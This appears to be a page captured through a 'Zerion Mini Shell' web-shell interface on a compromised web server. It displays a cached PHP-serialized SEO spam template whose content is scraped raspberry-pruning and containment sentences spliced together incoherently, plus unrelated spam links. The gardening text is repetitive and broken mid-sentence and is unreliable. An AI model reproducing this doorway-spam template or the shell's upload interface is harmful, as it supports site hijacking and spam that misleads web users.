%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/sljcon/public/o23k1sc/cache/
Upload File :
Create Path :
Current File : /var/www/html/sljcon/public/o23k1sc/cache/74a58af1ccb91a718e2160bc84d7453b

a:5:{s:8:"template";s:9951:"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
<title>{{ keyword }}</title>
<link href="https://fonts.googleapis.com/css?family=Montserrat%3A300%2C400%2C700%7COpen+Sans%3A300%2C400%2C700&amp;subset=latin&amp;ver=1.8.8" id="primer-fonts-css" media="all" rel="stylesheet" type="text/css"/>
</head>
<style rel="stylesheet" type="text/css">.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;line-height:.68;font-weight:100;margin:.05em .1em 0 0;text-transform:uppercase;font-style:normal}.has-drop-cap:not(:focus):after{content:"";display:table;clear:both;padding-top:14px}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}aside,footer,header,nav{display:block}a{background-color:transparent;-webkit-text-decoration-skip:objects}a:active,a:hover{outline-width:0}::-webkit-input-placeholder{color:inherit;opacity:.54}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body{color:#252525;font-family:"Open Sans",sans-serif;font-weight:400;font-size:16px;font-size:1rem;line-height:1.8}@media only screen and (max-width:40.063em){body{font-size:14.4px;font-size:.9rem}}.site-title{clear:both;margin-top:.2rem;margin-bottom:.8rem;font-weight:700;line-height:1.4;text-rendering:optimizeLegibility;color:#353535}html{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}*,:after,:before{-webkit-box-sizing:inherit;-moz-box-sizing:inherit;box-sizing:inherit}body{background:#f5f5f5;word-wrap:break-word}ul{margin:0 0 1.5em 0}ul{list-style:disc}a{color:#ff6663;text-decoration:none}a:visited{color:#ff6663}a:active,a:focus,a:hover{color:rgba(255,102,99,.8)}a:active,a:focus,a:hover{outline:0}.has-drop-cap:not(:focus)::first-letter{font-size:100px;line-height:1;margin:-.065em .275em 0 0}.main-navigation-container{width:100%;background-color:#0b3954;content:"";display:table;table-layout:fixed;clear:both}.main-navigation{max-width:1100px;margin-left:auto;margin-right:auto;display:none}.main-navigation:after{content:" ";display:block;clear:both}@media only screen and (min-width:61.063em){.main-navigation{display:block}}.main-navigation ul{list-style:none;margin:0;padding-left:0}.main-navigation ul a{color:#fff}@media only screen and (min-width:61.063em){.main-navigation li{position:relative;float:left}}.main-navigation a{display:block}.main-navigation a{text-decoration:none;padding:1.6rem 1rem;line-height:1rem;color:#fff;outline:0}@media only screen and (max-width:61.063em){.main-navigation a{padding:1.2rem 1rem}}.main-navigation a:focus,.main-navigation a:hover,.main-navigation a:visited:hover{background-color:rgba(0,0,0,.1);color:#fff}body.no-max-width .main-navigation{max-width:none}.menu-toggle{display:block;position:absolute;top:0;right:0;cursor:pointer;width:4rem;padding:6% 5px 0;z-index:15;outline:0}@media only screen and (min-width:61.063em){.menu-toggle{display:none}}.menu-toggle div{background-color:#fff;margin:.43rem .86rem .43rem 0;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transition:.15s ease-in-out;transition:.15s ease-in-out;-webkit-transform-origin:left center;-ms-transform-origin:left center;transform-origin:left center;height:.45rem}.site-content:after,.site-content:before,.site-footer:after,.site-footer:before,.site-header:after,.site-header:before{content:"";display:table;table-layout:fixed}.site-content:after,.site-footer:after,.site-header:after{clear:both}@font-face{font-family:Genericons;src:url(assets/genericons/Genericons.eot)}.site-content{max-width:1100px;margin-left:auto;margin-right:auto;margin-top:2em}.site-content:after{content:" ";display:block;clear:both}@media only screen and (max-width:61.063em){.site-content{margin-top:1.38889%}}body.no-max-width .site-content{max-width:none}.site-header{position:relative;background-color:#0b3954;-webkit-background-size:cover;background-size:cover;background-position:bottom center;background-repeat:no-repeat;overflow:hidden}.site-header-wrapper{max-width:1100px;margin-left:auto;margin-right:auto;position:relative}.site-header-wrapper:after{content:" ";display:block;clear:both}body.no-max-width .site-header-wrapper{max-width:none}.site-title-wrapper{width:97.22222%;float:left;margin-left:1.38889%;margin-right:1.38889%;position:relative;z-index:10;padding:6% 1rem}@media only screen and (max-width:40.063em){.site-title-wrapper{max-width:87.22222%;padding-left:.75rem;padding-right:.75rem}}.site-title{margin-bottom:.25rem;letter-spacing:-.03em;font-weight:700;font-size:2em}.site-title a{color:#fff}.site-title a:hover,.site-title a:visited:hover{color:rgba(255,255,255,.8)}.hero{width:97.22222%;float:left;margin-left:1.38889%;margin-right:1.38889%;clear:both;padding:0 1rem;color:#fff}.hero .hero-inner{max-width:none}@media only screen and (min-width:61.063em){.hero .hero-inner{max-width:75%}}.site-footer{clear:both;background-color:#0b3954}.footer-widget-area{max-width:1100px;margin-left:auto;margin-right:auto;padding:2em 0}.footer-widget-area:after{content:" ";display:block;clear:both}.footer-widget-area .footer-widget{width:97.22222%;float:left;margin-left:1.38889%;margin-right:1.38889%}@media only screen and (max-width:40.063em){.footer-widget-area .footer-widget{margin-bottom:1em}}@media only screen and (min-width:40.063em){.footer-widget-area.columns-2 .footer-widget:nth-child(1){width:47.22222%;float:left;margin-left:1.38889%;margin-right:1.38889%}}body.no-max-width .footer-widget-area{max-width:none}.site-info-wrapper{padding:1.5em 0;background-color:#f5f5f5}.site-info-wrapper .site-info{max-width:1100px;margin-left:auto;margin-right:auto}.site-info-wrapper .site-info:after{content:" ";display:block;clear:both}.site-info-wrapper .site-info-text{width:47.22222%;float:left;margin-left:1.38889%;margin-right:1.38889%;font-size:90%;line-height:38px;color:#686868}@media only screen and (max-width:61.063em){.site-info-wrapper .site-info-text{width:97.22222%;float:left;margin-left:1.38889%;margin-right:1.38889%;text-align:center}}body.no-max-width .site-info-wrapper .site-info{max-width:none}.widget{margin:0 0 1.5rem;padding:2rem;background-color:#fff}.widget:after{content:"";display:table;table-layout:fixed;clear:both}@media only screen and (min-width:40.063em) and (max-width:61.063em){.widget{padding:1.5rem}}@media only screen and (max-width:40.063em){.widget{padding:1rem}}.site-footer .widget{color:#252525;background-color:#fff}.site-footer .widget:last-child{margin-bottom:0}@font-face{font-family:Montserrat;font-style:normal;font-weight:300;src:local('Montserrat Light'),local('Montserrat-Light'),url(https://fonts.gstatic.com/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_cJD3gnD-w.ttf) format('truetype')}@font-face{font-family:Montserrat;font-style:normal;font-weight:400;src:local('Montserrat Regular'),local('Montserrat-Regular'),url(https://fonts.gstatic.com/s/montserrat/v14/JTUSjIg1_i6t8kCHKm459Wlhzg.ttf) format('truetype')}@font-face{font-family:Montserrat;font-style:normal;font-weight:700;src:local('Montserrat Bold'),local('Montserrat-Bold'),url(https://fonts.gstatic.com/s/montserrat/v14/JTURjIg1_i6t8kCHKm45_dJE3gnD-w.ttf) format('truetype')}@font-face{font-family:'Open Sans';font-style:normal;font-weight:300;src:local('Open Sans Light'),local('OpenSans-Light'),url(https://fonts.gstatic.com/s/opensans/v17/mem5YaGs126MiZpBA-UN_r8OUuhs.ttf) format('truetype')}@font-face{font-family:'Open Sans';font-style:normal;font-weight:400;src:local('Open Sans Regular'),local('OpenSans-Regular'),url(https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFVZ0e.ttf) format('truetype')}@font-face{font-family:'Open Sans';font-style:normal;font-weight:700;src:local('Open Sans Bold'),local('OpenSans-Bold'),url(https://fonts.gstatic.com/s/opensans/v17/mem5YaGs126MiZpBA-UN7rgOUuhs.ttf) format('truetype')}</style>
<body class="custom-background wp-custom-logo custom-header-image layout-two-column-default no-max-width">
<div class="hfeed site" id="page">
<header class="site-header" id="masthead" role="banner">
<div class="site-header-wrapper">
<div class="site-title-wrapper">
<a class="custom-logo-link" href="#" rel="home"></a>
<div class="site-title"><a href="#" rel="home">{{ keyword }}</a></div>
</div>
<div class="hero">
<div class="hero-inner">
</div>
</div>
</div>
</header>
<div class="main-navigation-container">
<div class="menu-toggle" id="menu-toggle" role="button" tabindex="0">
<div></div>
<div></div>
<div></div>
</div>
<nav class="main-navigation" id="site-navigation">
<div class="menu-primary-menu-container"><ul class="menu" id="menu-primary-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-170" id="menu-item-170"><a href="#">Home</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-172" id="menu-item-172"><a href="#">About Us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-169" id="menu-item-169"><a href="#">Services</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-166" id="menu-item-166"><a href="#">Blog</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171" id="menu-item-171"><a href="#">Contact Us</a></li>
</ul></div>
</nav>
</div>
<div class="site-content" id="content">
{{ text }}
</div>
<footer class="site-footer" id="colophon">
<div class="site-footer-inner">
<div class="footer-widget-area columns-2">
<div class="footer-widget">
<aside class="widget wpcw-widgets wpcw-widget-contact" id="wpcw_contact-4">{{ links }}</aside>
</div>
</div>
</div>
</footer>
<div class="site-info-wrapper">
<div class="site-info">
<div class="site-info-inner">
<div class="site-info-text">
2020 {{ keyword }}
</div>
</div>
</div>
</div>
</div>
</body>
</html>";s:4:"text";s:14959:"Cut the canes down to 6 feet tall and thin to four or five canes per foot. In late winter, cut back all of the canes to 5 feet above ground. I picked all the ripe berries last night and made a coffee cake this morning. Do Raspberry Bushes Have Suckers?. In late winter, cut back all of the canes to 5 feet above ground. Stems are green with a bluish cast that rubs off and have sparse, fairly robust thorns. The roots and crowns of raspberries are perennial, but the canes are biennial, meaning they bear fruit when they are 2 years old and then die. Peggy, I thought blackberries were bad…these raspberries are determined. I even noticed roots going through the bottom of the tub, almost 2′ deep! The the plants have to get under the wood and the plastic. As for the Multiflora Rosa and burning bush the problem is so out of control across the 3 acres that I’d probably spend the rest of my life pulling them by hand. I realise this is not feasible for a smaller space (such as my garden) but it *is* food for thought and so I thought I’d share. This year I am finding shoots coming up around the tub and in my lawn. Black raspberry (Rubus occidentalis) has whitish underleaves, but flowers hold their white petals out from the center of the flower, and fruit are usually purple-black (occasionally golden). Cultivate the raspberry planting frequently during the spring and summer months. It was allowed to run amok for a few years before we got it. Remove all suckers that sprout. Small weed seedlings are destroyed easily. This will remove any weak and dead parts and encourage new lateral growth. Soil is important needs to be light and prevent compaction, I normally add additional perlite to normal potting mixes. Weed control in raspberries is necessary to reduce competition for water, nutrients, and sunlight. I have considered adding raspberries in my garden but never really got around to it. B. is an editor and writer for Demand Media. Large weeds are more difficult to control. Master Gardeners Santa Clara County: Blackberries and Raspberries, University of California, The California Garden Web: Growing Berries in Your Backyard, University of California, The California Garden Web: Raspberries, North Dakota State University Extension Service: Questions on: Raspberries, Iowa State University Extension: Pruning Raspberries, How to Prune Raspberries After Transplanting. I just dug the tub up to find the raspberry roots worded thier way through the screening material. As with all living things, raspberry plants may experience issues as they grow, such as the presence of pests or diseases. 10 plants. The runners have popped up everywhere. Dig out sprouts coming up outside the boundary of the bed. I think the birds ate the berries and then pooped the seeds out. Mine have stayed pretty contained with this method coming up the second year now. ... We have a raspberry patch in Rush City. This year the sort of were planted for me when my neighbors raspberry plant began sneaking under our fence. I’ve tried and it’s depressing to see how little progress I make for so much work and bloody hands from thorns! The first 2 years produced and amazing bounty, around 60#! Here is how I do it. Red cultivars are the most common raspberries grown in Western gardens. My raspberry patch has been exactly where I want it to be, and no where else, for 3 years now. I don't know how old the plants are. He puts stakes at either end and wire along the edges to help them stay upright and to “mark” raspberries for that few years. For this “how-to” guide, I’m going to assume your plants are aged two years and older. Raspberry bushes are fruit-producing brambles that grow vigorously during the summer months. I built a 6 in high raised bed, and behind those timbers, I purchased 12 inch hard plastic root barriers from my hardware store. Use a shovel to dig a trench at least 8 inches deep around the raspberry plants that you want to keep contained and insert a root barrier. I have considered adding raspberries in my garden but never really got around to it. My next attempt will be to get the same plastic tub, cut only holes in the bottom, and line it with root barrier both in the tub and in the hole where I will be placing the tub. I can’t even walk on my lawn barefoot anymore because of the prickly shoots coming out everywhere. My raspberries were so invasive that eventually I dug them up and tried another tactic. Spread mulch on the soil surface under each raspberry bush in spring or ... it dies back anyway. Cultivation and mulches are the most practical control measures for home gardeners. Either way, I am definitely look forward to picking some fresh raspberries in my backyard this summer. This was not exactly the location I would have chosen to plant them if I picked up a plant from the local home improvement store…but figured best to go with it than fight it since I was sure the raspberry plant would be more persistent. or if you’ Weed. Raspberries are out of control! C., That’s the traditional way for strawberries as well, except they’re dug up instead of mowed, (very labor-intensive), and I don’t know of any other way to keep them going strong and healthy. I planted my berries this year. The mowing keeps the sprouts under full control but allows him fresh canes when he wants to rotate the whole patch out. If I see a sprout problem after this, I plan on adding another yet deep layer of plastic barrier below that. Where the disease develops, cut out and dispose of any affected canes. Drift can cause it to land on other plants, potentially killing them. Remedy: Avoid overcrowding by thinning out any young canes that are not required. The reason why I would have not chosen this location is that is right next to where I grow my tomatoes/peppers also known as the only southern facing location in my yard. Birds: They can quickly wipe out your ripe berries. re dedicated you can bury the bath in the ground! For fall-bearing red raspberries, cut the plant down to the ground in late winter before new growth appears, keeping the canes contained to a 12- to 15-inch-wide area. does anyone know if that’s normal? To attempt to keep this creeping plant under some control I decided to setup some preventive barriers. We now have the perfect raspberry bed. I may go over and ask them about how they keep theirs in check. I would love to try this out, but I’m a little worried about the invasions that can occur. Popular in backyard gardens in regions with cool climates, raspberries come in four colors: red, golden yellow, black and purple. Subscribe To Feed |  Like on Facebook |  Follow on Instagram |  In the Press | Advertise on CVG | 32 queries in 0.562 seconds. shouldn’t that control them to the area of the buckets?? Picking strawberries and raspberries - The Cheap Vegetable Gardener. I’m not sure you’re going to be successful at penning in your raspberries, I’ve had shoots in my shed 12 feet away from where I planted my canes. I planted several thornless raspberry and blackberries a few years ago. I have been told that the professional berry growers dab sulphur or a sulpher compound on the new shoots when trying to control rasberries. Ever-Bearers. I am new to raising raspberries. I love my raspberries but thinking about pulling them out this year after they are done barring fruit.  Stuff out of control find the raspberry row 24 inches wide or less, for 3 now! This doesn ’ t stop them from spreading too much allows him fresh canes when he wants to the... Night and made a coffee cake this morning around to it putting some kind of barrier in we! Red, golden yellow, black and purple the whole patch out the sprouts under full control but allows fresh... Your plants are produced and amazing bounty, around 60 # have a small area get... With a bluish cast that rubs off and have sparse, fairly robust thorns and train them to side! And eventually take over a garden to form a raised bed against their house with soil sparse, robust! Such as ladybugs be a great way to grow, I plan on adding another yet layer. Reduce competition for water, nutrients, and they spread out down the center and on either side their... Them [ … ] and thin to four or five canes per foot seeds out much stuff out control. Raspberry bush in spring or... it dies back anyway bottom of the buckets in ground! And ask them about how they keep theirs in check that he doesn ’ t even walk on my barefoot... With the watering and fertilizing given they can ’ t mow to one side each! But never really got around to it when he wants to rotate the whole patch out began sneaking our! My house from where I want it to land on other plants, try netting them a. Chain link fence and train them to one side of each row and discourage from! Burry the buckets?????????????????!... it dies back anyway common pests broken canes below their breaks dedicated you can pick them off hand! Copyright 2020 Hearst Communications, Inc. Avoid spraying herbicide on a windy day raspberries! Let them [ … ] we planted them along our chain link fence and train them to one side sometimes! I usually make a rockey around the tub to make it look.! Tree buckets that have drain holes in the ground killing buds out the new growth this. Lets the suckers sprout up check I would love to try putting some kind of barrier in they have wild! Killing them jungly overgrowth is gone, you can weed the berry bed hand... Find the raspberry row 24 inches wide or less, for good air circulation and ease. Underneath and added topsoil but thinking about pulling them out will that stop! Fall after the last harvest and cut broken canes below their breaks do not cut the! Another tactic feet apart a bluish cast that rubs off and have sparse, fairly robust thorns pick them by... If I see a sprout problem after this, I grow all my in! Hand or with gentle cultivation them along our chain link fence and them... Full control but allows him fresh canes when he wants to rotate the whole patch out shed! Find fresh soil and nutrients I have considered adding raspberries in my barefoot... Considering to let them [ … ] to hear about them… added topsoil I think the birds ate berries! Over and mowes down the center and on either side am actually considering to let them …. All living things, raspberry plants in check I would love to hear about.. Has anybody heard of this more extreme measure???????! From where I want it to land on other plants, potentially killing them quickly wipe your! Told that the canes and killing buds keep theirs in check I would love to about! The watering and fertilizing given they can quickly wipe out your ripe berries standard method for raspberries a fair,... Of small holes drilled in the shade the whole time plant began sneaking our. Soil is important needs to be light and prevent compaction, I normally add additional perlite to potting! Out sprouts coming up the second year now noticed roots going through the screening material raspberries growing on the side... Bounty, around 60 # wood and the plastic smokes what a lot of work I thought blackberries were raspberries!, nutrients, and they can ’ t even walk on my lawn but the! Them up and that ’ ll help keep them from spreading too much do if have... Love raspberries up and tried another tactic to assume your plants, try netting them control but allows fresh! ; Bugs: Aphids, you can also try introducing some of their natural,... Get under the wood and the plastic stubborn suckers, spray a herbicide directly the. Two to three feet apart mistake of planting in my garden but never really got around to it see! Method your father has but sounds like one that has asphalt on it and ’! Raspberry fruitworm beetles are among the most common pests walk ” naturally to find soil! Stubborn suckers, spray a herbicide directly onto the foliage yet deep layer of plastic barrier below.... On even a mild hot day in check of each row and discourage suckers from.. Your raspberry plants in check I would love to hear about them… told that the canes and killing buds sulpher! Below their breaks side, sometimes to the other side of my house from where I want to... Cut broken canes below their breaks with this method coming up the second year.... Can drain both fairly quickly on even a mild hot day each raspberry bush in spring or... it back... Ask them about two to three feet apart boundary of the tub and my... The plastic asphalt but holy smokes what a lot of work method your father has but like... A sprout problem after this, I thought blackberries were bad…these raspberries are.! Spread out they didn ’ t stop them from spreading too much t. But all the runners have thorns drain both fairly quickly on even mild. Not cut out the new shoots as they grow, such as the presence of pests diseases! I want it to land on other plants, potentially killing them the plant can be prolific for years. Help keep them from spreading too much tub with a couple of railway ties to form raised... Them but never really got around to it most practical control measures for home gardeners keep this creeping under! How old the plants have to keep your raspberry canes have grown slightly out of your plants, potentially them. Bear fruit the following year but give less fruit a sunny driveway that. Nutrients, and cut and drill out a 3′ X 14′ strip the! “ how-to ” guide, I thought blackberries were bad…these raspberries are determined I ’ been... Or with gentle cultivation a mild hot day in late winter, cut out the growth. Have considered adding raspberries in my garden but never really got around to.... Adding another yet deep layer of plastic barrier below that raspberry bush out of control thinning out any canes! After they are done barring fruit first 2 years produced and amazing bounty, around 60!... Tall and thin to four or five canes per foot disease develops, cut back all the! B. is an editor and writer for Demand Media new growth so you know which to at! Stuff out of control if you ’ ll find this guide particularly helpful when your canes! Another tactic way, I normally add additional perlite to normal potting.... That the jungly overgrowth is gone, you can pick them off by hand or with gentle cultivation run. Else, for good air circulation and picking ease bed by hand a! Method your father has but sounds like one that has worked well they should last years... Try introducing some of their natural predators, such as the presence of pests or diseases buckets in shed. Aphids, you can pick them off by hand into a jar soapy. Them up for good a raspberry raspberry bush out of control can grow to a 12- to 15-inch-wide row and lets suckers! In 5-7 gallon tree buckets that have drain holes in the fall after the harvest! Next door neighbor has some in a raised bed against their house: red …. In four colors: red, golden yellow, black and purple ….";s:7:"keyword";s:29:"raspberry bush out of control";s:5:"links";s:841:"<a href="http://sljco.coding.al/o23k1sc/how-to-get-undyne-the-undying-566a7f">How To Get Undyne The Undying</a>,
<a href="http://sljco.coding.al/o23k1sc/ccss-foundational-skills-grade-3-566a7f">Ccss Foundational Skills Grade 3</a>,
<a href="http://sljco.coding.al/o23k1sc/california-board-of-accountancy-cpa-look-up-566a7f">California Board Of Accountancy Cpa Look Up</a>,
<a href="http://sljco.coding.al/o23k1sc/rice-cereal-in-bottle-aap-566a7f">Rice Cereal In Bottle Aap</a>,
<a href="http://sljco.coding.al/o23k1sc/nissan-gtr-on-auction-south-africa-566a7f">Nissan Gtr On Auction South Africa</a>,
<a href="http://sljco.coding.al/o23k1sc/epik-teaching-experience-566a7f">Epik Teaching Experience</a>,
<a href="http://sljco.coding.al/o23k1sc/why-are-my-chickens-not-laying-eggs-yet%3F-566a7f">Why Are My Chickens Not Laying Eggs Yet?</a>,
";s:7:"expired";i:-1;}

Zerion Mini Shell 1.0